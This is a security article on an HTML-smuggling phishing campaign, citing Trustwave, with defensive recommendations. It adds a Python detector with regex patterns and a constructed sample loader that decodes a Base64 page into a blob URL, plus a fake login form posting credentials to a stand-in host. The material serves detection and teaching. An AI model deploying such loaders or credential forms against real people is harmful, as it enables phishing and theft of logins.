Phishing attackers used an HTML smuggling technique to deliver malware. The attack began with a phishing email that looked like an American Express notification, leading to several redirects.
The last redirect went to a public Cloudflare R2 bucket hosting an HTML file. This file loaded external JavaScript code with a Base64-encoded string that, when decoded, revealed the actual phishing page. This shows how HTML smuggling can hide malicious content effectively.
The JavaScript code waits for the page to load before decoding a Base64-encoded HTML string into plain text, likely a phishing page designed to trick users into revealing sensitive information.
The code creates a hidden iframe to load the decoded phishing content, hiding the malicious activity from the user.
The openFileURL function creates a downloadable file from the decoded HTML content by constructing a Blob object from the data and its content type, then generates an object URL for that Blob. Finally, it redirects the browser to this URL to display the content and revokes the blob URL after a short delay to prevent memory leaks.
Blob URLs are temporary, browser-local addresses that reference binary data held in the browser's memory. Cybercriminals use this feature to assemble malicious files locally, on the client, which lets them avoid traditional security measures that inspect content in transit.
These files can deliver harmful payloads directly to users, making attacks harder to detect.
By generating files on the client side, attackers can embed them in normal web pages or exploit browser vulnerabilities, creating significant security risks.
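The following Python scanner is an added example, not code from the Trustwave write-up or from the campaign itself: it applies the indicators described above to an HTML file (atob, Blob, createObjectURL, revokeObjectURL, a hidden iframe, navigation to a blob URL) and decodes any long base64 literal to check whether it carries an HTML page. The loader and the decoded page it scans are constructed samples, and the regexes and thresholds are my own assumptions rather than the campaign's exact code.

```python
import base64
import re

# Static indicators of the blob-URL smuggling chain described above (assumed set).
INDICATORS = {
    "base64_decode":     re.compile(r"\batob\s*\("),
    "blob_constructor":  re.compile(r"\bnew\s+Blob\s*\("),
    "object_url":        re.compile(r"URL\.createObjectURL\s*\("),
    "object_url_revoke": re.compile(r"URL\.revokeObjectURL\s*\("),
    "hidden_iframe":     re.compile(r"<iframe[^>]*(?:display\s*:\s*none|\bhidden\b)", re.I),
    "blob_navigation":   re.compile(r"(?:window\.)?location(?:\.href)?\s*=", re.I),
}
# A long quoted base64 literal is the usual carrier for the smuggled page.
B64_LITERAL = re.compile(r"[\"']([A-Za-z0-9+/]{120,}={0,2})[\"']")

def decode_embedded_payloads(html):
    # Return the decoded bytes of every long base64 literal found in the HTML.
    payloads = []
    for match in B64_LITERAL.finditer(html):
        try:
            payloads.append(base64.b64decode(match.group(1), validate=True))
        except ValueError:  # a long token that is not valid base64 after all
            continue
    return payloads

def analyse(html):
    # Flag a page/attachment that assembles an HTML document client-side via a blob URL.
    hits = [name for name, rx in INDICATORS.items() if rx.search(html)]
    payloads = decode_embedded_payloads(html)
    smuggled = [p for p in payloads if b"<html" in p.lower() or b"<form" in p.lower()]
    suspicious = bool(smuggled) and {"blob_constructor", "object_url"} <= set(hits)
    return {"indicators": hits, "payloads": payloads,
            "smuggled_html": len(smuggled), "suspicious": suspicious}

# Constructed sample (not from the campaign): a loader that decodes a base64 page,
# wraps it in a text/html Blob, navigates to the blob URL and revokes it later.
SAMPLE_PAYLOAD = (b"<html><body><h1>Example document portal</h1>"
                  b"<form action=\"https://example.invalid/submit\" method=\"post\">"
                  b"<input name=\"email\"><input name=\"password\" type=\"password\">"
                  b"<button>Sign in</button></form></body></html>")
SAMPLE_B64 = base64.b64encode(SAMPLE_PAYLOAD).decode()
SAMPLE_HTML = (
    "<html><body><iframe id=\"f\" style=\"display:none\"></iframe><script>"
    "window.addEventListener('load', function () {"
    f"  var page = atob('{SAMPLE_B64}');"
    "  var blob = new Blob([page], {type: 'text/html'});"
    "  var url = URL.createObjectURL(blob);"
    "  window.location.href = url;"
    "  setTimeout(function () { URL.revokeObjectURL(url); }, 1000);"
    "});</script></body></html>")
BENIGN_HTML = "<html><body><p>Quarterly newsletter</p><img src=\"logo.png\"></body></html>"
```

Calling analyse(SAMPLE_HTML) reports all six indicators and one decoded HTML payload, while analyse(BENIGN_HTML) reports none; in a mail gateway the decoded payloads would be handed to the normal HTML/URL scanning stage.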
The phishing pages use a sophisticated HTML smuggling technique to hide malicious code within seemingly legitimate HTML elements. They mimic trusted services like DocuSign and Microsoft to trick users into entering sensitive information.
Attackers exploit HTML’s flexibility to hide malicious code within its structure, making detection difficult for traditional security measures. This highlights the need for vigilant security practices and advanced threat detection to combat evolving phishing attacks.
HTML smuggling is a growing concern as it bypasses traditional security by hiding malicious content in seemingly harmless HTML files, often using obfuscation techniques like blob URLs.
Trustwave notes that as phishing attacks become more sophisticated, the use of HTML smuggling is expected to increase, making advanced security solutions essential for organizations.
Here are some recommendations to combat HTML smuggling and phishing attacks:
- Implement Advanced Threat Detection: Use security solutions that can detect hidden malicious code and advanced obfuscation techniques.
- Enhance Email Security: Deploy email filtering solutions to block phishing emails before they reach users.
- Conduct Security Awareness Training: Educate employees on recognizing phishing attempts and the risks of HTML smuggling.
- Utilize Web Filtering Tools: Use web filters to block access to known malicious sites and detect harmful content.
- Employ Multi-Factor Authentication (MFA): Require MFA for accessing sensitive systems to add an extra layer of security.
- Monitor Network Traffic: Regularly monitor network activity for unusual behavior that may indicate an attack.
- Regularly Update Software: Keep all software, including browsers and security tools, up to date to protect against vulnerabilities.
- Conduct Regular Security Audits: Perform audits to identify and address potential weaknesses in security measures.
- Implement Content Security Policies (CSP): Use CSP to control which resources can be loaded on your web pages, reducing the risk of loading malicious content.
- Encourage Strong Password Practices: Promote the use of strong, unique passwords and password managers to protect against unauthorized access.